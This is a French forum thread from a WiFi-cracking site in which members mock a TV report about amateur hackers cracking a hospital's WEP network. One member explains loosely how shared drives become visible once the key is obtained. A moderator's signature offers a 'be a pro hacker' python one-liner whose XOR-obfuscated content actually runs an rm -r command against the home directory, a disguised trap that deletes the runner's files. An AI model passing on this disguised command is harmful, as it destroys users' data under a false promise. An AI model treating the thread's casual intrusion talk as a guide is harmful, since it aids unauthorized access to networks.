Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#26 09-06-2011 01:56:25

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Re : Les Nouveaux Pirates de L'informatique

Ben je suppose qu'une fois la clef en main il se connecte à la box dont la connexion est partagée sur un réseau local.
De ce fait une fois connecté tu fais partit de ce réseau et tu peux de ce fait voir tous les partages.

Ce qui est bizzare, c'est la facilité avec laquelle ils se connectent depuis "l'extérieur".
En gros t'arrives comme une fleur de n'importe ou on t'attribue une IP (locale) sans plus de vérif que ça et roule ma poule.

Je suppose que soit les admins sont un brin à la ramasse.
Soit ils ou  la méthode la plus simple à cause du nombre de périphériques et du nombre d'utilisateurs ayant besoin d'un accès. (Plus probable)
Après en ce qui concerne le choix du WEP, je ne sais plus pourquoi mais j'avais lu quelque part que le WPA était incompatible avec certains protocoles réseau. (Je ne sais pas si protocole est le bon terme).

Ca doit pas être évident entre les pc, les machines mécidales, les users, les imprimantes etc etc ....
Il doit y avoir un éco système bien fourni dans un hôpital, une gestion réstrictive des droits sur l'ensemble des périphériques doit être une tâche de titan.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#27 09-06-2011 05:09:57

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

.

Dernière modification par Fuji (09-06-2011 05:14:41)

#28 09-06-2011 11:36:02

algerino
Membre d'Or

???

Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

#29 09-06-2011 17:30:29

noireaude
Membre d'honneur
Site Web

Chuttt !!!    lol

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#30 09-06-2011 17:34:22

Avmaktslave
Membre Indéboulonnable
Lieu : var\mobile

Pff. Je sais même pas quoi en penser c'est pathétique. On dirait M6 !

#31 09-06-2011 18:36:38

algerino
Membre d'Or

alors Noireaude les commandes pour voir les lecteurs partagés lorsque tu as la clé wep?

Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

#32 09-06-2011 18:46:21

noireaude
Membre d'honneur
Site Web

Ben je me trompe peut être, mais tu n'as pas besoin de commandes spécifiques sauf bien sur si tu es accroc au terminal.
Il te suffit d'un navigateur de fichiers genre Thunar ou Nautilus et  Samba se charge du reste à savoir de faire causer tout ça ensemble.

Tu n'as qu'à cliquer sur l'icone serveur réseau sur Ubuntu par exemple et il t'affiche direct les différentes machines présentes sur le réseau ou tu te trouves.
Ainsi que l'ensemble des dossiers/fichiers partagés.

Ce que tu vas pouvoir en faire ensuite ou les dossier auquel tu vas avoir accès (avec ou sans mot de passe) dépend juste des droits qui te sont attribués lecture/écriture etc etc....

Je suppose que les zozos du reportage ne font que se connecter sur un réseau dont la connexion est partagée.
Il n'y a rien d'incroyable la dedans.
Vu leur niveau, ca m'étonnerais fort qu'ils aient fait autre chose que de cliquer sur connect et ouvert un navigateur dans la foulée qui leur a affiché les partages une fois la clé en main.

Le principal challenge (qui n'en est pas un dans ce cas) reste d'obtenir la clé afin de te connecter sur le réseau.

Je suppose également toutes proportions gardées que c'est comme sur un LAN à la différence que ce qui est partagé est une connexion sans-fil.

#33 09-06-2011 20:50:41

mzutg
Membre Indéboulonnable

" on pourrait tuer quelqu'un en 1 clic" Non mais c'est quoi ces attardés ?

#34 09-06-2011 21:14:31

algerino
Membre d'Or

donc si je comprends bien Noireaude, je cracke la clé wep de mon reseau wifi et ensuite je vais sur Samba et j'aurai acces à mon reseau c sa? sauf si je partage mes dossiers??rectifie moi !
Dans la video justement les lecteurs sont protégés par mot de passe ! en route pour le decryptage lol wink

#35 09-06-2011 23:00:10

noireaude
Membre d'honneur
Site Web

Je n'ai pas fais attention à ca mais je suppose qu'on ne voit pas tout et qu'il n'ont rien fait de plus que de butter sur un mot de passe la ou il y en avait.

Après c'est bien ce que je te disais, tu peux voir les partages
Mais tes actions dépendent des droits, mot de passe = décryptage ou BF, dico je suis d'accord avec ça en effet etc etc ...

J'ai pas fais gaffe j'ai peut être utilisé le terme (accéder) ce qui est faux en effet.
J'entendais par la "voir".

[edit] J'ai bien parlé de voir.

#36 10-06-2011 08:29:44

spawn
Modérateur

C'ets peut-être les journalistes eux-même qui se sont déguisés pour faire ça.
D'où le floutage des visages ^^

Le protocole WPA peut être installé sur n'importe quel matériel WEP, mais ca nécéssite un upgrade du firmware.
(Et dans un hôpital, on peut supposer qu'il y a une multitude !=  firmwares)

Le WPA2 (qui est moins poutrable que le WPA qui n'est que du WEP plus robuste) nécéssite du matos particulier.
Plus d'infos sur google ou wikipedia.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#37 10-06-2011 15:59:39

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

C'ets peut-être les journalistes eux-même qui se sont déguisés pour faire ça.
D'où le floutage des visages ^^

Non je ne pense pas, on voit aussi dans la vidéo que ces plaisantins ont eu comme même le culot de s’attaquer aux serveurs du ministère de la culture, c’est dire à tel point face aux journaliste, ils ressentaient comme un besoin d’afficher une fierté, que nous sommes doté d’un pouvoir. Vous savez, seul les enfants n’ont pas peur de transformer leur rêves en réalité lol

Combien sont-ils comme ça à oser s’attaquer à n’importe quoi ? par défit, fierté, ou jeu. On comprend la préoccupation des politiques face à ces dérives, l’agence nationale de la sécurité des systèmes d’information (ANSSI) peut elle tout contrôler et venir à bout de ces problèmes ? on se souvient il y a peut du ministère de l’économie et des fiances victime d’une attaque informatique. Quant aux hôpitaux et cliniques ils doivent renforcer leur sécurité, sans que des hackeurs mal intentionnés ou pas, viennent leur faire savoir wink

#38 15-06-2011 01:30:30

algerino
Membre d'Or

J'y crois pas trop le Kill connection vous y pensez quoi vous? hmm

#39 15-06-2011 01:41:15

noireaude
Membre d'honneur
Site Web

On ne sait trop de qu'elle connexion il s'agit, alors on peut en penser plein de choses et rien à la fois.
Mais tu dois bien avoir un tool qui sert à ce genre de trucs.

De tout façon faut pas perdre de vue que les gars sont aussi médiocres que le reportage donc bon .....

Les gars un peu malin auraient vérifié avant et ne se seraient pas arrêtés comme un gland devant le commissariat pour en repartir comme des paumés après avoir vu que c'était du WPA.

Il auraient repéré un plan sur et auraient fait ça de manière plus pro, du moins dans "l'aspect"

Idem pour leur, on voit bien à la vitesse ou ils détalent (d'ailleurs pourquoi aussi vite ?) que c'est la première fois qu'ils osent cliquer et aller jusqu'au bout.

Leur coup de fil aussi est pathétique, le gars arrive même pas à s'expliquer clairement.

Encore une fois, pas de quoi en faire un plat, les journalistes on juste voul montrer que même des non pros peuvent faire des conneries.

Et ils on trouvé les bons client smile

#40 25-06-2011 12:58:03

slax
Membre V.I.P.

Dans ce reportage, je en sais pas quel est le plus désolant et triste.

Que ça soit une parodie de hackers ? Ou bien qu'ils arrivent tout de même à faire tomber le site du ministère en trois clic de souris...

#41 29-06-2011 23:41:17

Jack Sparrow
Membre Indéboulonnable

lol, on dirait des vrais puceaux boulet

Annonce